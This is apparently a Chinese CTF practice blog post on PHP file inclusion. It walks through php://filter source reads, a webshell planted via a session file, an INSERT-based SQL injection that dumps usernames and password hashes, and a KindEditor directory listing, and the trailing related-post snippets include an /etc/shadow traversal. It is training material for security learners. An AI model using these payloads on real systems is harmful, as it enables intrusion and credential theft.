CTF之萌新web学习(文件包含)

最新推荐文章于 2024-05-11 15:18:25 发布
最新推荐文章于 2024-05-11 15:18:25 发布
阅读量653 收藏 1
点赞数
分类专栏: ctf 刷题 文章标签: 安全 php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bmth666/article/details/104616201
版权
ctf 同时被 2 个专栏收录
22 篇文章 2 订阅
订阅专栏
刷题
19 篇文章 2 订阅
订阅专栏

文章目录


在这里插入图片描述

文件包含漏洞

在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。

相关函数

  1. include()
  2. include_once()
  3. require()
  4. require_once()

include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序的执行。

而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。

远程文件包含

PHP的配置文件allow_url_fopen和allow_url_include设置为ON,include/require等包含函数可以加载远程文件,如果远程文件没经过严格的过滤,导致了执行恶意文件的代码,这就是远程文件包含漏洞。

allow_url_fopen = On(是否允许打开远程文件)
allow_url_include = On(是否允许include/require远程文件)

伪协议

php://filter
可以以base64的编码读取文件
?file=php://filter/read=convert.base64-encode/resource=index.php
php:input
php://input可以读取没有处理过的POST数据
利用条件:

  1. allow_url_include=On
  2. 对allow_url_fopen不作要求

利用

包含的时候,不一定要包含php文件(即非可执行php文件)类似于:

  1. a.phps
  2. a.xxx
  3. a.jpg

只要里头包含一块完整的php代码即可,例如一个a.txt文件,内容为

<?php phpinfo(); ?>

session

PHP默认生成的session文件往往存放在/tmp目录下,可以在包含session这里进行php语句
实验环境:i春秋web题:notebooke
在这里插入图片描述
进入界面很明显的文件包含,module为文件后缀,file为文件名,包含robots.txt试试
在这里插入图片描述
发现不存在,多试试发现
在这里插入图片描述
module只识别后缀为php的文件,并且发现有php1nFo.php ,说明很可能有session
注册用户名为

<?php $_GET[a](base64_decode($_GET[s]));?>

由于会过滤关键语句,使用base64编码的传输上去的
在这里插入图片描述
并且发现session的值为PHPSESSID:fr906uqdh424sm2gr7nddjfoq1
查看phpinfo()
在这里插入图片描述
这里是一个坑,session并不在这个文件夹,这题有个提示tips: 文件包含phpinfo是不是有新的发现
在这里插入图片描述
好了,接下来就是访问这个文件触发php函数,文件在
../../../tem/SESS/sess_fr906uqdh424sm2gr7nddjfoq1存在,最后引用语句cat flag

在这里插入图片描述

综合性例题

实验环境:i春秋web题:Blog
在这里插入图片描述
进入页面发现有注册,登录,先注册试试
在这里插入图片描述
发现有一个写入的功能
在这里插入图片描述
这里猜测是不是运用了数据库的insert功能
在这里插入图片描述
猜测有三列,但无法确认,由于insert还可以插入下一段,继续尝试
在这里插入图片描述
显示success,但发现博客内容没有显示,说明第一个和最后一个不可控,导致无法插入,只能更改第2,3个,继续尝试,闭合第三个title=111&content=1111','a'),( 'a' , database() , 'a
在这里插入图片描述
成功执行了database(),注入即可
title=111&content=1111','a'),( 'a' , (select group_concat(table_name) from information_schema.tables where table_schema=database()),'a

在这里插入图片描述
title=111&content=1111','a'),( 'a' , (select group_concat(column_name) from information_schema.columns where table_name='users') , 'a
在这里插入图片描述
title=111&content=1111','a'),( 'a' , (select group_concat(username) from users) , 'a

title=111&content=1111','a'),( 'a' , (select group_concat(password) from users) , 'a
在这里插入图片描述
成功爆出来了admin和password
在这里插入图片描述
md5解密为melody123,进入管理员
在这里插入图片描述
发现一个文件包含,尝试文件位置是可以找到flag的
在这里插入图片描述
base64解码即可
在这里插入图片描述
这里其实有个kindeditor漏洞,可以利用
在这里插入图片描述
KindEditor上传解析漏洞、列目录、内容漏洞
尝试利用漏洞
http://d22d4241757d46d8934e4f38ee42661837b5d72e845240ff.changame.ichunqiu.com/kindeditor/php/file_manager_json.php?path=
在这里插入图片描述
发现可行,就可以列出所有文件名了
在这里插入图片描述

可参考文章:Web安全实战系列:文件包含漏洞

Bmth
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFweb学习记录 -- 文件包含
lifanxin的博客
05-11 1万+
文件包含概述常见文件包含函数和原理本地文件包含远程文件包含总结 概述   后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,因此该过程也就被称为文件包含文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。 常见文件包含函数和原理 # php include() // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行 require() // 程序运行就
CTF WEB文件包含
weixin_30949361的博客
09-29 544
文件包含 题目要求: 请找到题目中FLAG 漏洞源码 <meta charset='utf-8'> <center><h1>文件阅读器</h1></center> <!-- 据说flag在flag.php里 --> <?php error_reporting(0); $f=$_GET['file']; if(s...
2024年最新网络安全CTF ——web_文件包含,2024年最新系列教学
最新发布
2401_84545213的博客
05-11 1100
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
CTFshow web入门——文件包含
小元砸的博客
02-07 3463
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
CTF-WEB-文件包含
2301_79721580的博客
11-08 271
最近跟着大师傅的课程学习ctfweb,随想记录下知识点,便于日后的复习,难免会有错误,望师傅们能多加指点,今天进入文件包含学习。1.文件包含的本质1>代码复用2>并行开发3>模块化4>增加移植性2.include和eval的异同同:都不是函数,都是语言结构,无法通过配置文件函数禁用来禁用。异:include:后面接一个路径表示执行php文件的路径,读取路径中文件中内容后,然后执行里面的php代码eval:后面接php代码,表示要执行的php代码3.php常见文件包含函数、语言结构。
CG CTF-Web-文件包含
feng的博客
09-05 296
WP 由于题目比较简单,不扯什么心路历程了,直接上WP。 首先看到题目就知道是文件包含,即使题目没有明说,点击链接。 发现了?file=show.php。 也需要知道这大概率就是文件包含了。我因为之前有个题目看到这样的没有察觉,导致跑偏了。既然错过了一次,就要吸取经验。 知道了文件包含,就利用文件包含相关的知识点去解题。 我首先用了php://input,结果出了Oh, on。我以为是过滤了php:,所以我换了一种协议: data://text/plain,<?php system("ls /")
CTF工具之御剑后台扫描(web).rar
09-16
3. **文件包含漏洞探测**:检查网站是否允许恶意的文件包含操作,可能导致代码执行或信息泄露。 4. **SQL注入测试**:利用各种SQL注入攻击技术,探测数据库的漏洞,如盲注、时间延迟注入等。 5. **XSS跨站脚本扫描...
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件上传漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
CTF工具之antsword(web).rar
09-16
antsword的核心功能在于帮助参赛者发现并利用Web应用中的漏洞,比如SQL注入、XSS跨站脚本攻击、文件包含漏洞等。 antsword的主要特点包括: 1. **多平台支持**:antsword支持Windows、Linux和Mac OS等多个操作系统...
ctfhub web全部做题记录(持续跟新)
01-08
【总结】在CTF Web挑战中,了解信息泄露、备份文件、源码解析、文件后缀、vim缓存、版本控制、弱口令、SQL注入、文件上传漏洞等概念至关重要。掌握这些技能可以帮助参赛者在比赛中发现并利用安全漏洞,获取flag。...
CTF工具之seay源代码审计系统(web).rar
09-16
CTF工具之seay源代码审计系统(web)】是一个专门为网络安全竞赛(CTF,Capture The Flag)设计的源代码审计工具,主要用于Web安全领域。这个工具的主要目的是帮助参赛者或者安全研究人员检测和分析Web应用程序中...
网络安全CTF ——web_文件包含
weixin_63274653的博客
01-27 422
通过查看php.ini文件,发现allow_url_fopen 和 allow_url_include都是打开的,所以可以判断是远程文件包含。这里URL的意思是:读取index.php的内容,并把输入流进行base64编码,不进行base64编码就如法读取源码,就看不到flag。指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件。直接读取目标机上的Flag文件,通常可以通过操纵变量去读取。文件包含类型分为两种,一种是本地文件包含,另一种是远程文件包含。通过给定的URL查看源码。
CTF---Web---文件包含---09--etc/shadow
qq_22160557的博客
07-28 472
文章目录前言一、题目描述二、解题步骤1、 构造payload三、总结 前言 题目分类: CTFWeb文件包含—09–etc/shadow 一、题目描述 题目: 文件包含 链接:http://172.16.15.216/stage/12/ 二、解题步骤 1、 构造payload 读取linux的/etc/shadow文件,用#截断目录 http://172.16.15.216/stage/12/show.php?file=…/…/…/…/etc/shadow# 三、总结 1、/etc/shadow
CTF---Web---文件包含---02---rot13伪协议
qq_22160557的博客
07-28 1513
文章目录前言一、题目描述二、解题步骤1、页面跳转2、文件包含(参数为page)3、rot13伪协议包含4、rot13伪协议读取5、rot13编码解码6、代码审计7、构造payload8、得到flag总结 前言 题目分类: CTFWeb文件包含—02—rot13伪协议 一、题目描述 题目:13、另辟蹊径 (题号为13) 二、解题步骤 1、页面跳转 Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。 2、文件包含(参数为page) Step2:点击
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 626
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTFSHOW】web入门文件包含
7ruth0hn的博客
07-23 1563
CTFSHOW】web入门文件包含 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 没有过滤,一开始想直接包含flag.php,发现一片空白。使用php://filter伪协议读取flag.php内容,进行base64解码得到flag。 payload: ?file=php://filter/convert.base6
CTF---Web---文件包含---03---require_once
qq_22160557的博客
07-28 1654
文章目录前言一、题目描述二、解题步骤1、御剑扫描2、审计源代码3、构造payload4、查表名5、查列名6、查字段名总结 前言 题目分类: CTFWeb文件包含—03—require_once 一、题目描述 题目: b-11-未写完的网站 二、解题步骤 1、御剑扫描 Step1:用御剑扫描后,得到web.zip,为网站源代码。 2、审计源代码 Step2:题目逻辑: info.php页面中的role变量未经过addslashes过滤,经过将传入的$tem参数赋值为…/edit_info时,re
CTF---Web---文件包含---10---三种本地包含
qq_22160557的博客
07-29 844
文章目录前言一、题目描述二、逻辑解析三、解题方法1、将flag.php读入变量hello中2、 eval存在命令执行漏洞,用hello构造payload3、构造伪协议四、总结 前言 题目分类: CTFWeb文件包含—10—三种本地包含 一、题目描述 题目: 文件包含 二、逻辑解析 <?php include "flag.php"; //可知flag在flag.php里, $a = @$_REQUEST['hello']; //$_REQUEST[]支持get
web入门 文件包含
博客地址 www.sec0nd.top
04-13 301
文章目录web78web79web80web87web88 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 最简单的php伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php 再base64解码可得flag web79 &lt
ctf.show萌新web8
07-12
2. 文件包含:检查是否存在可以包含任意文件的漏洞,尝试读取敏感文件或者执行恶意代码。 3. 文件上传:检查是否存在可以上传任意文件的漏洞,尝试上传恶意文件并执行。 4. XSS(跨站脚本攻击):尝试在用户输入中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值